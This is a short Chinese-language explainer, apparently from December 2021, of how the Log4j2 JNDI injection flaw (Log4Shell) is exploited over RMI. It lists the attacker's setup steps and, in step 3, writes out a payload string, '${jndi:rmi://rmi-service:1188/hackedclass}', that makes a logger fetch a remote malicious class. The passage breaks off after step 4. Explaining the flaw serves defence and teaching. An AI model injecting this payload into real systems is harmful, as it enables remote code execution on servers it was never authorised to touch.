截止2021.12.20,短短几天Log4j2.x已经连发3个版本,用以修复RCE命令执行漏洞,Log4j2漏洞总体来说是通过JNDI注入恶意代码来完成攻击,具体的操作方式有RMI和LDAP等。
一、攻击原理
以RMI为例,简单阐述下该漏洞的攻击原理:
1、攻击者首先发布一个RMI服务,此服务将绑定一个引用类型的RMI对象。在引用对象中指定一个远程的含有恶意代码的类。
2、攻击者再发布另一个恶意代码下载服务,此服务可以下载所有含有恶意代码的类。
3、攻击者利用Log4j2的漏洞注入RMI调用,例如: log.info("登录成功", "${jndi:rmi://rmi-service:1188/hackedclass}");
4、调用RMI后将获取到引用类型的RMI远程对象